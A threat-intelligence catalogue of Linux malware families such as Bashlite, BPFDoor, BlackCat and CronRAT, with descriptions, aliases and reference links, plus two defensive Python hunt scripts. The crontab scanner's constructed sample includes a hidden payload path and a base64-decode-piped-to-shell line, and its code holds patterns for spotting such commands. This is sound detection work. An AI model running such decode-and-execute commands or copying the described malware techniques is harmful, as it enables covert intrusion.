Bashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.

The tag is: misp-galaxy:malpedia="Bashlite"

Bashlite is also known as:

  • Gafgyt

  • gayfgt

  • lizkebab

  • qbot

  • torlus

Table 2276. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite

https://unit42.paloaltonetworks.com/new-hoaxcalls-ddos-botnet/

https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/

https://blog.netlab.360.com/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/

https://blog.netlab.360.com/the-gafgyt-variant-vbot-and-its-31-campaigns/

https://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/

https://www.uptycs.com/blog/discovery-of-simps-botnet-leads-ties-to-keksec-group

https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/

https://cybersecurity.att.com/blogs/labs-research/code-similarity-analysis-with-r2diaphora

https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/

https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/

https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf

http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/

https://www.nozominetworks.com/blog/could-threat-actors-be-downgrading-their-malware-to-evade-detection/

https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/

https://maxkersten.nl/binary-analysis-course/malware-analysis/corona-ddos-bot/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/

https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt

https://www.avira.com/en/blog/a-gafgyt-variant-that-exploits-pulse-secure-cve-2020-8218

https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/

BCMPUPnP_Hunter

The tag is: misp-galaxy:malpedia="BCMPUPnP_Hunter"

BCMPUPnP_Hunter is also known as:

Table 2277. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.bcmpupnp_hunter

https://blog.netlab.360.com/bcmpupnp_hunter-a-100k-botnet-turns-home-routers-to-email-spammers-en/

BiBi-Linux

According to Security Joes, this malware is an x64 ELF executable, lacking obfuscation or protective measures. It allows attackers to specify target folders and can potentially destroy an entire operating system if run with root permissions. During execution, it produces extensive output, which can be mitigated using the "nohup" command. It also leverages multiple threads and a queue to corrupt files concurrently, enhancing its speed and reach. Its actions include overwriting files, renaming them with a random string containing "BiBi," and excluding certain file types from corruption.

The tag is: misp-galaxy:malpedia="BiBi-Linux"

BiBi-Linux is also known as:

Table 2279. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.bibi_linux

https://www.securityjoes.com/post/bibi-linux-a-new-wiper-dropped-by-pro-hamas-hacktivist-group

Bifrost

Linux version of the Bifrose malware that originally targeted the Windows platform only. The backdoor has the ability to perform file management, start or end a process, or start a remote shell. The connection is encrypted using a modified RC4 algorithm.

The tag is: misp-galaxy:malpedia="Bifrost"

Bifrost is also known as:

  • elf.bifrose

Table 2280. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.bifrost

https://cyberandramen.net/2022/12/30/a-quick-look-at-elf-bifrose/

https://teamt5.org/tw/posts/technical-analysis-on-backdoor-bifrost-of-the-Chinese-apt-group-huapi/

https://jp.security.ntt/resources/EN-BlackTech_2021.pdf

https://twitter.com/strinsert1Na/status/1595553530579890176

BigViktor

A DDoS bot abusing CVE-2020-8515 to target DrayTek Vigor routers. It uses a wordlist-based DGA to generate its C&C domains.

The tag is: misp-galaxy:malpedia="BigViktor"

BigViktor is also known as:

Table 2281. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.bigviktor

https://blog.netlab.360.com/bigviktor-dga-botnet/

BioSet

The tag is: misp-galaxy:malpedia="BioSet"

BioSet is also known as:

Table 2282. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.bioset

https://twitter.com/IntezerLabs/status/1409844721992749059

BlackCat (ELF)

ALPHV, also known as BlackCat or Noberus, is a ransomware family that is deployed as part of Ransomware as a Service (RaaS) operations. ALPHV is written in the Rust programming language and supports execution on Windows, Linux-based operating systems (Debian, Ubuntu, ReadyNAS, Synology), and VMware ESXi. ALPHV is marketed as ALPHV on cybercrime forums, but is commonly called BlackCat by security researchers due to an icon of a black cat appearing on its leak site. ALPHV has been observed being deployed in ransomware attacks since November 18, 2021.

ALPHV can be configured to encrypt files using either the AES or ChaCha20 algorithms. In order to maximize the amount of ransomed data, ALPHV can delete volume shadow copies, stop processes and services, and stop virtual machines on ESXi servers. ALPHV can self-propagate by using PsExec to remotely execute itself on other hosts on the local network.

The tag is: misp-galaxy:malpedia="BlackCat (ELF)"

BlackCat (ELF) is also known as:

  • ALPHV

  • Noberus

Table 2284. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackcat

https://twitter.com/sisoma2/status/1473243875158499330

https://www.forescout.com/resources/analysis-of-an-alphv-incident

https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive

https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html

https://x.com/vxunderground/status/1731138180672344095?t=reBMQQFFMGQ_zkV8KmL_LA&s=01

https://killingthebear.jorgetesta.tech/actors/alphv

https://www.zdnet.com/article/blackcat-ransomware-implicated-in-attack-on-german-oil-companies/

https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html

https://github.com/rivitna/Malware/tree/main/BlackCat/ALPHV3

https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html

https://www.theregister.com/2022/03/22/talos-ransomware-blackcat/

https://mssplab.github.io/threat-hunting/2023/07/13/malware-analysis-blackcat.html

https://krebsonsecurity.com/2022/01/who-wrote-the-alphv-blackcat-ransomware-strain/

https://securityintelligence.com/posts/blackcat-ransomware-levels-up-stealth-speed-exfiltration/

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v

https://www.crowdstrike.com/blog/hypervisor-jackpotting-lack-of-antivirus-support-opens-the-door-to-adversaries/

https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/

https://www.intrinsec.com/alphv-ransomware-gang-analysis/

https://securelist.com/a-bad-luck-blackcat/106254/

https://blog.group-ib.com/blackcat

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/blackcat-ransomware-as-a-service.html

https://www.cisa.gov/sites/default/files/2023-11/aa23-320a_scattered_spider.pdf

https://securelist.com/new-ransomware-trends-in-2022/106457/

https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/

https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf

https://www.computerweekly.com/news/252525240/ALPHV-BlackCat-ransomware-family-becoming-more-dangerous

https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://blog.emsisoft.com/en/40931/ransomware-profile-alphv/

BlackMatter (ELF)

The tag is: misp-galaxy:malpedia="BlackMatter (ELF)"

BlackMatter (ELF) is also known as:

Table 2285. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackmatter

https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html

https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor

https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf

https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/

https://blog.group-ib.com/blackmatter#

https://us-cert.cisa.gov/ncas/alerts/aa21-291a

https://www.youtube.com/watch?v=NIiEcOryLpI

https://twitter.com/GelosSnake/status/1451465959894667275

https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html

https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751

https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html

https://twitter.com/VK_Intel/status/1423188690126266370

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/

https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/

https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group

https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/

https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d

https://www.bleepingcomputer.com/news/security/linux-version-of-blackmatter-ransomware-targets-vmware-esxi-servers/

https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/

https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service

https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2

https://news.sophos.com/en-us/2021/08/09/blackmatter-ransomware-emerges-from-the-shadow-of-darkside/

https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/

https://www.mandiant.com/resources/chasing-avaddon-ransomware

https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/

https://blog.group-ib.com/blackmatter2

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf

BlackSuit (ELF)

According to Trend Micro, this ransomware has significant code overlap with Royal Ransomware.

The tag is: misp-galaxy:malpedia="BlackSuit (ELF)"

BlackSuit (ELF) is also known as:

Table 2287. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.blacksuit

https://www.trendmicro.com/en_us/research/23/e/investigating-blacksuit-ransomwares-similarities-to-royal.html

https://blog.cyble.com/2023/05/12/blacksuit-ransomware-strikes-windows-and-linux-users/

BOLDMOVE (ELF)

According to Mandiant, this malware family is attributed to actors with a likely Chinese background and is directly related to the observed exploitation of Fortinet’s FortiOS SSL-VPN vulnerability (CVE-2022-42475). A Windows variant also exists.

The tag is: misp-galaxy:malpedia="BOLDMOVE (ELF)"

BOLDMOVE (ELF) is also known as:

Table 2288. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.boldmove

https://thehackernews.com/2023/01/new-chinese-malware-spotted-exploiting.html

https://www.mandiant.com/resources/blog/chinese-actors-exploit-fortios-flaw

Break out the Box

This is a pentesting tool. According to the author, "BOtB is a container analysis and exploitation tool designed to be used by pentesters and engineers while also being CI/CD friendly with common CI/CD technologies."

It has been observed in use by TeamTNT in campaigns spreading crypto-mining malware.

The tag is: misp-galaxy:malpedia="Break out the Box"

Break out the Box is also known as:

  • BOtB

Table 2289. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.botb

https://github.com/brompwnie/botb

BPFDoor

BPFDoor is a passive backdoor used by a China-based threat actor. Rather than opening a listening port, it attaches a BPF filter to a raw socket and waits for a trigger packet; it supports TCP, UDP and ICMP for communicating with its C2, giving the operator several ways to interact with the implant.

The tag is: misp-galaxy:malpedia="BPFDoor"

BPFDoor is also known as:

  • JustForFun

Table 2291. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.bpfdoor

https://exatrack.com/public/Tricephalic_Hellkeeper.pdf

https://twitter.com/cyb3rops/status/1523227511551033349

https://blog.qualys.com/vulnerabilities-threat-research/2022/08/01/heres-a-simple-script-to-detect-the-stealthy-nation-state-bpfdoor

https://www.bleepingcomputer.com/news/security/stealthier-version-of-linux-bpfdoor-malware-spotted-in-the-wild/

https://unfinished.bike/fun-with-the-new-bpfdoor-2023

https://www.trendmicro.com/en_us/research/23/g/detecting-bpfdoor-backdoor-variants-abusing-bpf-filters.html

https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/

https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896

https://twitter.com/CraigHRowland/status/1523266585133457408

https://www.crowdstrike.com/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/

https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

https://nikhilh-20.github.io/blog/cbpf_bpfdoor/

https://www.mandiant.com/resources/blog/chinese-espionage-tactics

https://elastic.github.io/security-research/intelligence/2022/05/04.bpfdoor/article/

https://troopers.de/troopers22/talks/7cv8pz/

brute_ratel

The tag is: misp-galaxy:malpedia="brute_ratel"

brute_ratel is also known as:

Table 2292. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.brute_ratel

https://bruteratel.com/

Caja

Linux malware cross-compiled for x86, MIPS and ARM. Its strings are XOR-encoded, and its C&C protocol supports 13 commands, including file download, file modification and execution, and running shell commands.

The tag is: misp-galaxy:malpedia="Caja"

Caja is also known as:

Table 2294. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.caja

https://mp.weixin.qq.com/s/pd6fUs5TLdBtwUHauclDOQ

Caligula

According to Avast Decoded, Caligula is a multiplatform IRC bot used to perform DDoS attacks. It is written in Go and distributed as ELF files targeting 32- and 64-bit Intel, 32-bit ARM and 64-bit PowerPC. It is based on the open source Hellabot project.

The tag is: misp-galaxy:malpedia="Caligula"

Caligula is also known as:

Table 2295. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.caligula

https://decoded.avast.io/davidalvarez/go-malware-on-the-rise/

Capoae

XMRig-based mining malware written in Go.

The tag is: misp-galaxy:malpedia="Capoae"

Capoae is also known as:

Table 2296. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.capoae

https://www.akamai.com/blog/security/capoae-malware-ramps-up-uses-multiple-vulnerabilities-and-tactics-to-spread

CDRThief

The tag is: misp-galaxy:malpedia="CDRThief"

CDRThief is also known as:

Table 2298. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.cdrthief

https://www.welivesecurity.com/2020/09/10/who-callin-cdrthief-linux-voip-softswitches/

Cephei

The tag is: misp-galaxy:malpedia="Cephei"

Cephei is also known as:

Table 2299. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.cephei

https://cybersecurity.att.com/blogs/labs-research/malware-using-new-ezuri-memory-loader

Cetus

The tag is: misp-galaxy:malpedia="Cetus"

Cetus is also known as:

Table 2300. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.cetus

https://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/

Chaos (ELF)

Multi-functional malware written in Go, targeting both Linux and Windows, evolved from elf.kaiji.

The tag is: misp-galaxy:malpedia="Chaos (ELF)"

Chaos (ELF) is also known as:

Table 2301. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.chaos

https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/

https://www.trendmicro.com/en_us/research/22/l/linux-cryptomining-enhanced-via-chaos-rat-.html

Chisel (ELF)

Chisel is an open-source project by Jaime Pillora (jpillora) that tunnels TCP and UDP connections over HTTP. It is cross-platform and written in Go. While benign in itself, Chisel has been used by multiple threat actors; SentinelOne, for example, observed it during a PYSA ransomware intrusion, where it served as a backdoor for persistent access. GitHub: https://github.com/jpillora/chisel

The tag is: misp-galaxy:malpedia="Chisel (ELF)"

Chisel (ELF) is also known as:

Table 2303. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.chisel

https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/

ConnectBack

ConnectBack is a backdoor that establishes an unauthorized outbound connection from an infected system to a remote server, i.e. a reverse-connect (reverse shell) backdoor. Once a victim’s device is compromised, ConnectBack creates a covert channel for communication, allowing the attacker to remotely control the system and gather sensitive information from it.

The tag is: misp-galaxy:malpedia="ConnectBack"

ConnectBack is also known as:

  • Getshell

Table 2306. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.connectback

https://labs.sucuri.net/signatures/malwares/pl-backdoor-connectback-001/
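The two entries above describe behaviour that is visible in /proc on a live host: BPFDoor holds a raw AF_PACKET socket so it can sniff for its trigger packet, and rewrites its own argv so `ps` shows a harmless daemon name; a ConnectBack-style reverse shell ends up as a shell process whose stdin and stdout are network sockets rather than a pty. The following hunt script is an added example, not code from Malpedia or from any of the reports cited on this page. It reads the real /proc when run on Linux; the `SAMPLE` snapshot (hypothetical pids, paths and inodes) is constructed so the checks also run offline.

```python
"""Hunt /proc for BPFDoor-style passive implants and ConnectBack-style reverse
shells. Added example; sample data is constructed, not real artifacts."""
import os
from dataclasses import dataclass, field

SHELLS = {"sh", "bash", "dash", "zsh", "ash", "ksh"}


@dataclass
class Proc:
    pid: int
    exe: str        # target of /proc/<pid>/exe ("" if unreadable)
    comm: str       # /proc/<pid>/comm
    cmdline: str    # /proc/<pid>/cmdline with NULs replaced by spaces
    fds: dict = field(default_factory=dict)   # fd number -> readlink target


def packet_socket_inodes(proc_net_packet: str) -> set:
    """Inodes of AF_PACKET sockets; 'Inode' is the last column of /proc/net/packet."""
    rows = (line.split() for line in proc_net_packet.splitlines()[1:])
    return {cols[-1] for cols in rows if cols}


def _same_program(argv0: str, exe: str) -> bool:
    """Lenient basename comparison so 'python3' vs 'python3.11' is not a hit."""
    a, e = os.path.basename(argv0), os.path.basename(exe.replace(" (deleted)", ""))
    return bool(a) and (a.startswith(e) or e.startswith(a))


def hunt_bpfdoor(procs, packet_inodes):
    """Flag packet-socket owners whose argv[0] does not match the real executable,
    or whose executable has been unlinked or lives only in memory."""
    hits = []
    for p in procs:
        if not any(t == f"socket:[{i}]" for t in p.fds.values() for i in packet_inodes):
            continue   # tcpdump, dhclient etc. own packet sockets too; alone that is no hit
        argv0 = p.cmdline.split(" ", 1)[0] if p.cmdline else ""
        if p.exe.endswith("(deleted)") or p.exe.startswith("/memfd:"):
            hits.append((p.pid, f"packet socket held by deleted/in-memory exe {p.exe!r}"))
        elif not _same_program(argv0, p.exe):
            hits.append((p.pid, f"packet socket + argv0 {argv0!r} masquerading for {p.exe!r}"))
    return hits


def hunt_reverse_shell(procs):
    """A reverse shell dup2()s its socket onto fd 0/1/2 before exec'ing a shell, so
    the shell's stdin and stdout resolve to 'socket:[inode]' instead of a pty."""
    return [(p.pid, f"{p.comm} with stdin/stdout bound to sockets")
            for p in procs
            if p.comm in SHELLS
            and p.fds.get(0, "").startswith("socket:")
            and p.fds.get(1, "").startswith("socket:")]


def snapshot_live():
    """Collect the real /proc (root is needed to read other users' exe/fd links)."""
    procs = []
    for name in filter(str.isdigit, os.listdir("/proc")):
        base = f"/proc/{name}"
        try:
            with open(f"{base}/comm") as f:
                comm = f.read().strip()
            with open(f"{base}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
        except OSError:
            continue   # process exited while we were walking
        try:
            exe = os.readlink(f"{base}/exe")
        except OSError:
            exe = ""
        try:
            fd_names = os.listdir(f"{base}/fd")
        except OSError:
            fd_names = []
        fds = {}
        for fd in fd_names:
            try:
                fds[int(fd)] = os.readlink(f"{base}/fd/{fd}")
            except OSError:
                pass
        procs.append(Proc(int(name), exe, comm, cmdline, fds))
    with open("/proc/net/packet") as f:
        return procs, packet_socket_inodes(f.read())


# Constructed snapshot (hypothetical pids, paths, inodes): 1337 mimics BPFDoor,
# 2001 is a legitimate tcpdump, 4242 is a reverse shell.
SAMPLE_PACKET = ("sk       RefCnt Type Proto  Iface R Rmem   User   Inode\n"
                 "0000000000000000 3      3    0003   2     1 0      0      31337\n"
                 "0000000000000000 3      3    0003   2     1 0      0      40001\n")
SAMPLE = [
    Proc(1337, "/dev/shm/.x (deleted)", "udevd", "/sbin/udevd -d",
         {0: "/dev/null", 1: "/dev/null", 3: "socket:[31337]"}),
    Proc(2001, "/usr/bin/tcpdump", "tcpdump", "tcpdump -i eth0 -w /tmp/cap.pcap",
         {0: "/dev/pts/0", 1: "/dev/pts/0", 3: "socket:[40001]"}),
    Proc(4242, "/usr/bin/dash", "sh", "sh -i",
         {0: "socket:[55555]", 1: "socket:[55555]", 2: "socket:[55555]"}),
]

if __name__ == "__main__":
    try:
        procs, inodes = snapshot_live()
    except OSError:            # not Linux: fall back to the constructed sample
        procs, inodes = SAMPLE, packet_socket_inodes(SAMPLE_PACKET)
    for pid, why in hunt_bpfdoor(procs, inodes) + hunt_reverse_shell(procs):
        print(pid, why)
```

Both checks are heuristics: a legitimate sniffer started through a symlink or wrapper can trip the argv/exe comparison, and a shell spawned by an inetd-style service will have socket stdio by design, so treat hits as leads to triage rather than verdicts.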

Conti (ELF)

Linux (ESXi) variant of the Conti ransomware.

The tag is: misp-galaxy:malpedia="Conti (ELF)"

Conti (ELF) is also known as:

  • Conti Locker

Table 2307. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.conti

https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike

https://resources.prodaft.com/wazawaka-report

https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022

https://www.secureworks.com/blog/gold-ulrick-continues-conti-operations-despite-public-disclosures

https://securelist.com/new-ransomware-trends-in-2022/106457/

https://www.justice.gov/opa/pr/multiple-foreign-nationals-charged-connection-trickbot-malware-and-conti-ransomware

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf

https://www.esentire.com/blog/analysis-of-leaked-conti-intrusion-procedures-by-esentires-threat-response-unit-tru

https://damonmccoy.com/papers/Ransomware_eCrime22.pdf

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-group-targets-esxi-hypervisors-with-its-linux-variant.html

https://www.youtube.com/watch?v=cYx7sQRbjGA

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again

https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html

Cpuminer (ELF)

cpuminer is an open-source CPU miner (see the GitHub link below). It has been observed being dropped by IoT malware that abuses infected devices for Litecoin and Bitcoin mining.

The tag is: misp-galaxy:malpedia="Cpuminer (ELF)"

Cpuminer (ELF) is also known as:

Table 2308. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.cpuminer

https://yoroi.company/research/outlaw-is-back-a-new-crypto-botnet-targets-european-organizations/

https://github.com/pooler/cpuminer

CronRAT

Malware written in Bash that hides its payload in the cron scheduler under a syntactically valid but non-existent date, February 31st, so the entry is accepted but never runs as a scheduled task. Observed in relation to Magecart attacks.

The tag is: misp-galaxy:malpedia="CronRAT"

CronRAT is also known as:

Table 2310. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.cronrat

https://sansec.io/research/cronrat
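The scheduling trick is easy to check for: cron accepts any day-of-month in 1-31 and any month in 1-12 without validating that the pair is a real date. The scanner below is an added example, not code from Sansec or Malpedia; it parses user-crontab lines (the /etc/crontab format has an extra user column, which it does not handle), flags entries whose day/month combination can never occur, and applies the Vixie-cron rule that when both day-of-month and day-of-week are restricted the job runs when either matches, which is the caveat that keeps "31 2 1" alive. The sample crontab is constructed.

```python
"""Flag crontab entries that can never fire: the CronRAT trick of parking a payload
on a syntactically valid but non-existent date. Added example; sample constructed."""
import re

DAYS_IN_MONTH = {1: 31, 2: 29, 3: 31, 4: 30, 5: 31, 6: 30,
                 7: 31, 8: 31, 9: 30, 10: 31, 11: 30, 12: 31}   # 29: leap years exist
# user crontab layout: minute hour day-of-month month day-of-week command
CRON_LINE = re.compile(r"^\s*(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+)$")


def expand(field: str, lo: int, hi: int) -> set:
    """Expand one numeric cron field ('*', '1,15', '1-5', '*/10', '1-10/2') to ints.
    Month/day names (jan, mon) are not handled and raise ValueError."""
    values = set()
    for part in field.split(","):
        step = 1
        if "/" in part:
            part, step = part.split("/", 1)
            step = int(step)
        if part == "*":
            start, end = lo, hi
        elif "-" in part:
            start, end = (int(x) for x in part.split("-", 1))
        else:
            start = end = int(part)
        if not lo <= start <= end <= hi:
            raise ValueError(f"{field!r} outside {lo}-{hi}")
        values.update(range(start, end + 1, step))
    return values


def never_fires(dom: str, month: str, dow: str) -> bool:
    """True when no real calendar date satisfies the day/month fields.
    Vixie cron caveat: if BOTH day-of-month and day-of-week are restricted, the
    job runs when EITHER matches, so '0 0 31 2 1' still runs every Monday."""
    if dom != "*" and dow != "*":
        return False
    days, months = expand(dom, 1, 31), expand(month, 1, 12)
    return not any(d <= DAYS_IN_MONTH[m] for m in months for d in days)


def scan_crontab(text: str):
    """Return (line_no, reason, line) for entries that look parked, not scheduled."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s or s[0] in "#@":            # comment, blank, @reboot-style specials
            continue
        m = CRON_LINE.match(line)
        if not m:                            # MAILTO=... and other env assignments
            continue
        _minute, _hour, dom, month, dow, cmd = m.groups()
        try:
            if never_fires(dom, month, dow):
                findings.append((n, f"impossible date: day {dom} of month {month}", line))
                continue
        except ValueError:
            findings.append((n, "unparseable schedule", line))
            continue
        # Secondary tell: a command body that is really an encoded payload.
        if len(cmd) > 512 or re.search(r"base64\s+(-d|--decode)\b", cmd):
            findings.append((n, "large or base64-decoded command body", line))
    return findings


# Constructed sample (not a real CronRAT artifact): lines 4-5 use the Feb 31 trick,
# line 6 shows the day-of-week escape hatch that keeps a '31 2' entry live.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=root
0 3 * * * /usr/bin/certbot renew --quiet
52 6 31 2 * /var/tmp/.x/payload.sh
52 6 31 2 * echo aGVsbG8K | base64 -d | sh
0 0 31 2 1 /usr/local/bin/weekly-report.sh
*/15 * * * * /usr/local/bin/healthcheck
"""

if __name__ == "__main__":
    for line_no, reason, line in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {line_no}: {reason}: {line}")
```

Run it over the output of `crontab -l -u <user>` for every user, plus the files under /var/spool/cron; an entry that can never fire has no legitimate reason to exist and is worth pulling for analysis whatever its command looks like.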

CyclopsBlink

According to CISA, Cyclops Blink appears to be a replacement framework for the VPNFilter malware exposed in 2018, and which exploited network devices, primarily small office/home office (SOHO) routers and network attached storage (NAS) devices. Cyclops Blink has been deployed since at least June 2019, fourteen months after VPNFilter was disrupted. In common with VPNFilter, Cyclops Blink deployment also appears indiscriminate and widespread. The actor has so far primarily deployed Cyclops Blink to WatchGuard and ASUS devices, but it is likely that Sandworm would be capable of compiling the malware for other architectures and firmware.

The tag is: misp-galaxy:malpedia="CyclopsBlink"

CyclopsBlink is also known as:

Table 2311. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.cyclops_blink

https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview

https://www.justice.gov/opa/video/attorney-general-merrick-b-garland-announces-enforcement-actions-disrupt-and-prosecute

https://attack.mitre.org/groups/G0034

https://www.justice.gov/opa/press-release/file/1491281/download

https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-disruption-botnet-controlled-russian-federation

https://www.bleepingcomputer.com/news/security/us-disrupts-russian-cyclops-blink-botnet-before-being-used-in-attacks/

https://www.bleepingcomputer.com/news/security/asus-warns-of-cyclops-blink-malware-attacks-targeting-routers/

https://www.theregister.com/2022/03/18/cyclops_asus_routers/

https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html

https://www.cisa.gov/uscert/ncas/alerts/aa22-054a

https://github.com/trendmicro/research/blob/main/cyclops_blink/c2-scripts/check.py

https://www.splunk.com/en_us/blog/security/strt-ta03-cpe-destructive-software.html

https://www.bleepingcomputer.com/news/security/cisa-warns-orgs-of-watchguard-bug-exploited-by-russian-state-hackers/

https://www.shadowserver.org/news/shadowserver-special-reports-cyclops-blink/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyclops-blink-sets-sights-on-asus-routers/Appendix_Cyclops%20Blink%20Sets%20Sights%20on%20ASUS%20Routers.pdf

Dacls (ELF)

According to PCrisk, Dacls is the name of a remote access Trojan (RAT), a malicious program that allows cyber criminals to control infected computers remotely.

Research shows that this malware is tied to Lazarus Group (a group of cyber criminals) and targets Linux and the Windows Operating System. Typically, cyber criminals use RATs to steal sensitive, confidential information, infect systems with other malware, and so on. In any case, no RAT is harmless and should be uninstalled immediately.

The tag is: misp-galaxy:malpedia="Dacls (ELF)"

Dacls (ELF) is also known as:

